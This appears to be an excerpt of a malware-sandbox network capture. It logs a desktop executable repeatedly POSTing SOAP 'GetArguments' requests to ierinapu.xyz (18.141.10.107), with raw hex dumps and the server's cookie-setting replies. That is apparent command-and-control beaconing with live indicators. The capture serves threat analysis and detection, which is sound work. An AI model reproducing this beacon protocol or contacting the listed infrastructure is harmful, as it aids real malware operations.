Oct 20, 2024 21:02:15.907783031 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:17.133744955 CEST	25	IN	HTTP/1.1 100 Continue
Oct 20, 2024 21:02:17.133781910 CEST	464	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 19:02:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=95a315e2400151d0e2f837341f559203\|96.44.151.125\|1729450936\|1729450936\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49713	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:18.149034977 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:18.501557112 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:19.917916059 CEST	489	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 30 20 4f 63 74 20 32 30 32 34 20 31 39 3a 30 32 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 62 74 73 74 3d 34 33 30 35 38 63 34 61 61 66 32 38 62 62 36 30 36 37 35 61 66 61 63 64 64 61 39 30 64 36 63 38 7c 39 36 2e 34 34 2e 31 35 31 2e 31 32 35 7c 31 37 32 39 34 35 30 39 33 39 7c 31 37 32 39 34 35 30 39 33 39 7c 30 7c 31 7c 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 69 65 72 69 6e 61 70 75 2e 78 79 7a 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 31 35 20 41 70 72 20 32 30 32 37 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 3b 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 [TRUNCATED] Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 20 Oct 2024 19:02:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: btst=43058c4aaf28bb60675afacdda90d6c8\|96.44.151.125\|1729450939\|1729450939\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMTContent-Encoding: gzip140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49727	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:20.929020882 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:21.282757044 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:22.456445932 CEST	25	IN	HTTP/1.1 100 Continue
Oct 20, 2024 21:02:22.456461906 CEST	464	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 19:02:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=35fc40394017e7c7124477d6a0a09b92\|96.44.151.125\|1729450942\|1729450942\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49742	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:23.475944042 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:23.829780102 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:25.067586899 CEST	25	IN	HTTP/1.1 100 Continue
Oct 20, 2024 21:02:25.067603111 CEST	464	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 19:02:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b460b00e2fe44fa09282a8e28802ac60\|96.44.151.125\|1729450944\|1729450944\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49752	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:26.085975885 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:26.439042091 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:27.612859011 CEST	489	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 30 20 4f 63 74 20 32 30 32 34 20 31 39 3a 30 32 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 62 74 73 74 3d 37 35 38 36 63 31 66 64 33 64 33 38 39 30 31 34 62 66 37 62 34 65 64 62 34 63 34 33 31 32 37 36 7c 39 36 2e 34 34 2e 31 35 31 2e 31 32 35 7c 31 37 32 39 34 35 30 39 34 37 7c 31 37 32 39 34 35 30 39 34 37 7c 30 7c 31 7c 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 69 65 72 69 6e 61 70 75 2e 78 79 7a 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 31 35 20 41 70 72 20 32 30 32 37 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 3b 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 [TRUNCATED] Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 20 Oct 2024 19:02:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: btst=7586c1fd3d389014bf7b4edb4c431276\|96.44.151.125\|1729450947\|1729450947\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMTContent-Encoding: gzip140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49763	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:28.632296085 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:28.986020088 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:30.197283983 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49775	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:31.227277994 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:31.579915047 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49787	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:33.804934978 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:34.158037901 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49797	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:36.382538080 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:36.735929966 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49811	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:39.444983959 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:39.798471928 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:40.994419098 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49823	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:42.013925076 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:42.361083984 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:43.552083015 CEST	25	IN	HTTP/1.1 100 Continue
Oct 20, 2024 21:02:43.552141905 CEST	464	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 19:02:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=82e57da4720384fd6c653ff6ea3d8559\|96.44.151.125\|1729450963\|1729450963\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49834	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:44.594475985 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:44.939131975 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:46.136037111 CEST	25	IN	HTTP/1.1 100 Continue
Oct 20, 2024 21:02:46.136080980 CEST	464	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 19:02:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a03e2ddd8e383f563fb577f28398193d\|96.44.151.125\|1729450965\|1729450965\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49847	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:47.148197889 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:47.501687050 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:49.164705992 CEST	25	IN	HTTP/1.1 100 Continue
Oct 20, 2024 21:02:49.164752960 CEST	464	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 19:02:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fb17b6af24dec11a069686b625e65b26\|96.44.151.125\|1729450968\|1729450968\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49860	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:50.179478884 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:50.532835007 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49872	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:52.757081032 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:53.114702940 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49883	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:55.319730997 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:55.673580885 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:56.904721975 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49897	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:57.913707018 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:58.267163038 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49912	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:00.478621960 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:00.829677105 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49923	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:03.091626883 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
